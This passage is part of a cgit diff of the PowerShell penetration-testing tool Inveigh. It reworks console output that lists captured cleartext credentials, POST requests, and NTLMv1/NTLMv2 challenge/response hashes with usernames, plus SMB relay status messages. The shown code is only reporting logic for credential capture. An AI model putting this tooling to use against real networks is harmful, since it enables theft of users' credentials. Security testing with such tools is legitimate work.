+ Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
}
- Start-Sleep -m 5
- }
-
- if($inveigh.NTLMv1_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($inveigh.POST_request_list.Count -gt 0)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+ Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
+ $inveigh.POST_request_list.Sort()
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ foreach($unique_POST_request in $inveigh.POST_request_list)
{
- Write-Output($unique_NTLMv1 + $inveigh.newline)
+ if($unique_POST_request -ne $unique_POST_request_last)
+ {
+ Write-Output($unique_POST_request + $inveigh.newline)
+ }
+
+ $unique_POST_request_last = $unique_POST_request
}
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ Start-Sleep -m 5
}
-
- $unique_NTLMv1_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
{
- Write-Output($NTLMv1_username + $inveigh.newline)
- }
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
- }
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- if($inveigh.NTLMv2_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv2_list.Sort()
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
{
- Write-Output($unique_NTLMv2 + $inveigh.newline)
+ Write-Output($NTLMv1_username + $inveigh.newline)
}
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ Start-Sleep -m 5
}
+ else
+ {
+ Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- $unique_NTLMv2_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
+ }
- foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
+ }
+ else
{
- Write-Output($NTLMv2_username + $inveigh.newline)
+ Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
}
-
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
}
- else
+
+ if($inveigh.console_input)
{
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
- }
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ }
+ Start-Sleep -m 5
}
- if($inveigh.console_input)
- {
+ }
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- }
+}
+finally
+{
- Start-Sleep -m 5
+ if($Tool -eq 2)
+ {
+ $inveigh.running = $false
}
}
@@ -4569,51 +4708,51 @@ if($inveigh.tool -ne 1)
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
+ while($inveigh.console_queue.Count -gt 0)
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
- {
-
- if($ConsoleOutput -eq 'Y')
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output $inveigh.console_queue[0]
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
- $inveigh.console_queue.RemoveAt(0)
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
- }
+ if($ConsoleOutput -eq 'Y')
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
- if($ConsoleOutput -ne "Low")
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
{
Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
- $inveigh.console_queue.RemoveAt(0)
-
}
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
+ }
if([Console]::KeyAvailable)
{
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 19:45:08 +0000